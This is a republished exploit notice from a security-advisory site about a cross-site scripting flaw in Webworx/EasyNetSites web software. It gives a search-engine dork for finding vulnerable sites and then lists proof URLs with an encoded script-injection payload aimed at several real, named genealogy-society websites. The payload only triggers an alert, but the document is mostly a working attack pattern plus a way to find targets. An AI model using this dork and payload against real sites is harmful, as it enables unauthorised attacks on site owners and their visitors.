Webworx Design Group Cross Site Scripting

Published
Credit
Risk
2016.12.21
Ashiyane Digital Security Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes
Dork: intext:"Design by Webworx Design Group • Powered by EasyNetSites.com Webware" cpage.php?pt=

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title: Webworx Design Group Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://www.easynetsites.com/
|[+]
|[+] Dork : intext:"Design by Webworx Design Group • Powered by EasyNetSites.com Webware" cpage.php?pt=
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12 /21/ 2016
|=============================================================|
|[+] Proof:
|[+]
|[+] http://ccgsi.org/surname.php?as=Y%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Ealert(123)%3C/ScRiPt%3E&nr=25&page=2&scl=c0a&srch=
|[+] http://www.llcgs.info/surname.php?as=Y%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Ealert(123)%3C/ScRiPt%3E&nr=25&page=2&scl=c0a&srch=
|[+] http://saghs-tx.org/surname.php?as=Y%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Ealert(123)%3C/ScRiPt%3E&nr=25&page=2&scl=c0a&srch=
|[+] http://www.anchoragegenealogy.org/surname.php?as=Y%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Ealert(123)%3C/ScRiPt%3E&nr=25&page=2&scl=c0a&srch=
|[+] http://www.ggsmn.org/surname.php?as=Y%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Ealert(123)%3C/ScRiPt%3E&nr=25&page=2&scl=c0a&srch=
|[+] http://spgstx.org/surname.php?as=Y%27%22()%26%25%3Cacx%3E%3CScRiPt


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com